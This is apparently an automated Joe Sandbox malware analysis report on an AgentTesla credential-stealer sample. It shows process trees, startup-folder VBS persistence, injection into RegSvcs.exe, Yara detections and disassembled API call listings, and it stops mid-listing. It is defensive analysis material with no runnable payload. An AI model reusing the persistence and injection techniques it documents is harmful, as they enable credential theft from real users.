JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1585828509.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:19:31
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs"
Imagebase:	0x7ff72c7c0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:19:32
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\roundup\phagocytose.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\roundup\phagocytose.exe"
Imagebase:	0xe20000
File size:	604'672 bytes
MD5 hash:	B12B444B2A02C69499AED36944384160
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:19:35
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\roundup\phagocytose.exe"
Imagebase:	0x90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2603734744.000000000241E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2603734744.0000000002406000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	9.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	204

Executed Functions

Function 00743B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00743B68
IsDebuggerPresent.KERNEL32 ref: 00743B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,008052F8,008052E0,?,?), ref: 00743BEB

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

Part of subcall function 0075092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00743C14,008052F8,?,?,?), ref: 0075096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00743C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007F7770,00000010), ref: 0077D281
SetCurrentDirectoryW.KERNEL32(?,008052F8,?,?,?), ref: 0077D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007F4260,008052F8,?,?,?), ref: 0077D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0077D346

Part of subcall function 00743A46: GetSysColorBrush.USER32(0000000F), ref: 00743A50
Part of subcall function 00743A46: LoadCursorW.USER32(00000000,00007F00), ref: 00743A5F
Part of subcall function 00743A46: LoadIconW.USER32(00000063), ref: 00743A76
Part of subcall function 00743A46: LoadIconW.USER32(000000A4), ref: 00743A88
Part of subcall function 00743A46: LoadIconW.USER32(000000A2), ref: 00743A9A
Part of subcall function 00743A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00743AC0
Part of subcall function 00743A46: RegisterClassExW.USER32(?), ref: 00743B16

Part of subcall function 007439D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00743A03
Part of subcall function 007439D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00743A24
Part of subcall function 007439D5: ShowWindow.USER32(00000000,?,?), ref: 00743A38
Part of subcall function 007439D5: ShowWindow.USER32(00000000,?,?), ref: 00743A41

Part of subcall function 0074434A: _memset.LIBCMT ref: 00744370
Part of subcall function 0074434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00744415

Strings

%}, xrefs: 00743C44
This is a third-party compiled AutoIt script., xrefs: 0077D279
runas, xrefs: 0077D33A

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%}
API String ID: 529118366-2264255860
Opcode ID: 0c6d99eaf3d3a1521d4bb1f79cac41b40a94f3883c3836b4df3c72a75373c646
Instruction ID: cb81915e02c7f8fd67aafd8799d662f2c12f5be0df850b9e97fd1fcbc856c492
Opcode Fuzzy Hash: 0c6d99eaf3d3a1521d4bb1f79cac41b40a94f3883c3836b4df3c72a75373c646
Instruction Fuzzy Hash: 6F51D271908148EADF55EBB4DC49EEE7B79FF05740B008069F419A21A2DB7C5A06CF31

Function 00743633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 007436D2
KillTimer.USER32(?,00000001), ref: 007436FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074371F
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0074372A
CreatePopupMenu.USER32 ref: 0074373E
PostQuitMessage.USER32(00000000), ref: 0074374D

Strings

%}, xrefs: 0077D081, 0077D0CF
TaskbarCreated, xrefs: 00743725

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated$%}
API String ID: 157504867-1720201399
Opcode ID: edc1c8024a57d92382bbd4440049a48883d8ce88037356b2464c1366879bcf51
Instruction ID: 175199411f4834d4a00208b54e6d758b670037e728249cad95ddd230cbe4d49b
Opcode Fuzzy Hash: edc1c8024a57d92382bbd4440049a48883d8ce88037356b2464c1366879bcf51
Instruction Fuzzy Hash: AC4113B2200506EBDF245F68DC4DB7A37A5FF00340F544129FA0A962E2DB6C9E549B76

Function 007449A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 007449CD

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

GetCurrentProcess.KERNEL32(?,007CFAEC,00000000,00000000,?), ref: 00744A9A
IsWow64Process.KERNEL32(00000000), ref: 00744AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00744AE7
FreeLibrary.KERNEL32(00000000), ref: 00744AF2
GetSystemInfo.KERNEL32(00000000), ref: 00744B23
GetSystemInfo.KERNEL32(00000000), ref: 00744B2F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 59cae94d95a5e9cd2193795fdb8813a2aa4487c07075c9d2624ac4203fd727db
Instruction ID: 68c4181c52d79180567a7f1d92accd09cb7b7b6ebd854a28e52cfbf9c1cb69ea
Opcode Fuzzy Hash: 59cae94d95a5e9cd2193795fdb8813a2aa4487c07075c9d2624ac4203fd727db
Instruction Fuzzy Hash: 2A91C9319897C0DECB31DB7889546AAFFF5AF2A300B488D5DD0CB53A41D728A908D75E

Function 00744E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00744E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00744D8E,?,?,00000000,00000000), ref: 00744EB0
LoadResource.KERNEL32(?,00000000,?,?,00744D8E,?,?,00000000,00000000,?,?,?,?,?,?,00744E2F), ref: 0077D937
SizeofResource.KERNEL32(?,00000000,?,?,00744D8E,?,?,00000000,00000000,?,?,?,?,?,?,00744E2F), ref: 0077D94C
LockResource.KERNEL32(00744D8E,?,?,00744D8E,?,?,00000000,00000000,?,?,?,?,?,?,00744E2F,00000000), ref: 0077D95F

Strings

SCRIPT, xrefs: 00744EA6

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 5d50d5e3be717a6edeba3e9199db460443de5cc66633d63a5dafbd19bb49f2ad
Instruction ID: 29ae21f708161faacb985591c875085d164123c30a48509ab4a446910c344fbc
Opcode Fuzzy Hash: 5d50d5e3be717a6edeba3e9199db460443de5cc66633d63a5dafbd19bb49f2ad
Instruction Fuzzy Hash: CE115A75240700BFE7218B65EC48F6BBBBEFBC5B51F20826CF506C6250DB65EC009A60

Function 0074FCE0 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1040COMMON

Download Yara Rule

Strings

%}, xrefs: 0074FCF3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: BuffCharUpper
String ID: %}
API String ID: 3964851224-578177530
Opcode ID: 8a23b1e9ea009276231625fe06d86f4f81d0d1048c5e11196cac5bd255f9a795
Instruction ID: 7d96c00fddffe96a65a29251f9fa005645fb24ecb62c906b30521f5ac1870ff8
Opcode Fuzzy Hash: 8a23b1e9ea009276231625fe06d86f4f81d0d1048c5e11196cac5bd255f9a795
Instruction Fuzzy Hash: 47924970608341DFD720DF24C484B6ABBE1BF85304F14896DE99A9B352D7B9EC49CB92

Function 008559E0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00855B1A
GetProcAddress.KERNEL32(?,0084EFF9), ref: 00855B38
ExitProcess.KERNEL32(?,0084EFF9), ref: 00855B49
VirtualProtect.KERNELBASE(00740000,00001000,00000004,?,00000000), ref: 00855B97
VirtualProtect.KERNELBASE(00740000,00001000), ref: 00855BAC

Memory Dump Source

Source File: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: 26f2e06f71020ac5a25e17ac0ae587894cb069420b9d931116ac0e266baeb4a5
Instruction ID: 636a6fbf16f8e27b5c962cc557e4b8e8fd9394b1ee06ed01d599c98e668b980f
Opcode Fuzzy Hash: 26f2e06f71020ac5a25e17ac0ae587894cb069420b9d931116ac0e266baeb4a5
Instruction Fuzzy Hash: 02512B72A54B664BD7225EB8CCE4660B794FB413367280738CDE2CB3C5F7A4580D87A1

Function 007A445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0077E398), ref: 007A446A
FindFirstFileW.KERNELBASE(?,?), ref: 007A447B
FindClose.KERNEL32(00000000), ref: 007A448B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 826ef002c82c3186c61a5773c36f3134571f1e65e99faa18eb6f62bb40c9b456
Instruction ID: 35dc8926fbba6c51b61f14ec33d3a3ba86b8631dd040fd3ff0b62c078b26a754
Opcode Fuzzy Hash: 826ef002c82c3186c61a5773c36f3134571f1e65e99faa18eb6f62bb40c9b456
Instruction Fuzzy Hash: 72E0D8324105406742106B38EC0DCED775DAE8A335F104719F835C10D0E7FC59009599

Function 0074E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00783E62

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 9d7c94a66415896b66e749aeeb6a57ed5062fe30bed099a95d2b4c4d786441b7
Instruction ID: 9a6708aa8ee8218dbf888bae3a16dfd7b3d073dcdd43279ed6d9e5ea3784537d
Opcode Fuzzy Hash: 9d7c94a66415896b66e749aeeb6a57ed5062fe30bed099a95d2b4c4d786441b7
Instruction Fuzzy Hash: 50A2AE75A00219CFCB24CF58C484ABEB7B2FF59320F248569E905AB351D779ED82CB91

Function 007509D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00750A5B
timeGetTime.WINMM ref: 00750D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00750E53
Sleep.KERNEL32(0000000A), ref: 00750E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00750EFA
DestroyWindow.USER32 ref: 00750F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00750F20
Sleep.KERNEL32(0000000A,?,?), ref: 00784E83
TranslateMessage.USER32(?), ref: 00785C60
DispatchMessageW.USER32(?), ref: 00785C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00785C82

Strings

@GUI_WINHANDLE, xrefs: 00784F8F
@GUI_CTRLHANDLE, xrefs: 00784FE4
@TRAY_ID, xrefs: 0078578F
@GUI_CTRLID, xrefs: 00784F3A
@COM_EVENTOBJ, xrefs: 007854F0

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 64ef6850a02bf022ee8604b2e3933b1aedd3d24109173585749d7f00610a5f71
Instruction ID: b14c36dbee6b22bcd5b3a0c16c100735393e6a3ce0201996c4b97eb069ae309a
Opcode Fuzzy Hash: 64ef6850a02bf022ee8604b2e3933b1aedd3d24109173585749d7f00610a5f71
Instruction Fuzzy Hash: 6CB2D470648741DFD724EF24C888FAAB7E5BF84304F14491DF949972A1DBB9E848CB92

Function 007A9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007A8F5F: __time64.LIBCMT ref: 007A8F69

Part of subcall function 00744EE5: _fseek.LIBCMT ref: 00744EFD

__wsplitpath.LIBCMT ref: 007A9234

Part of subcall function 007640FB: __wsplitpath_helper.LIBCMT ref: 0076413B

_wcscpy.LIBCMT ref: 007A9247
_wcscat.LIBCMT ref: 007A925A
__wsplitpath.LIBCMT ref: 007A927F
_wcscat.LIBCMT ref: 007A9295
_wcscat.LIBCMT ref: 007A92A8

Part of subcall function 007A8FA5: _memmove.LIBCMT ref: 007A8FDE
Part of subcall function 007A8FA5: _memmove.LIBCMT ref: 007A8FED

_wcscmp.LIBCMT ref: 007A91EF

Part of subcall function 007A9734: _wcscmp.LIBCMT ref: 007A9824
Part of subcall function 007A9734: _wcscmp.LIBCMT ref: 007A9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007A9452
_wcsncpy.LIBCMT ref: 007A94C5
DeleteFileW.KERNEL32(?,?), ref: 007A94FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007A9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A9534

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: d32b9084cea3be49edde61ff60c666405112bae9ae107153412de24b1f1c72bd
Instruction ID: cbec1e403a4f7c2458bf1aa8a1584f72a5ae62f6721cb415cd5e57a7d8ba3116
Opcode Fuzzy Hash: d32b9084cea3be49edde61ff60c666405112bae9ae107153412de24b1f1c72bd
Instruction Fuzzy Hash: 18C13BB1D00219EADF21DF95CC89EDEB7BDEF85310F0041AAF609E6141EB389A548F65

Function 0074708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00744706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008052F8,?,007437AE,?), ref: 00744724

Part of subcall function 0076050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00747165), ref: 0076052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007471A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0077E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0077E909
RegCloseKey.ADVAPI32(?), ref: 0077E947
_wcscat.LIBCMT ref: 0077E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 0074719E
\, xrefs: 0077E9C3
Include, xrefs: 0077E8BF, 0077E900
\Include\, xrefs: 00747165

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: c03cc74bd5cfcae3a15cf025504abea8f3d71db41535cfc72947a6f44fccb6ac
Instruction ID: 5e27576dcad8fbc221b1edb54a471a270b63c33529fddb2fcb67b40cebf26bf5
Opcode Fuzzy Hash: c03cc74bd5cfcae3a15cf025504abea8f3d71db41535cfc72947a6f44fccb6ac
Instruction Fuzzy Hash: D271BF71508301DEC744EF25EC459ABBBF8FF89350F40492EF449831A1EB79A968CB92

Function 00743A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00743A50
LoadCursorW.USER32(00000000,00007F00), ref: 00743A5F
LoadIconW.USER32(00000063), ref: 00743A76
LoadIconW.USER32(000000A4), ref: 00743A88
LoadIconW.USER32(000000A2), ref: 00743A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00743AC0
RegisterClassExW.USER32(?), ref: 00743B16

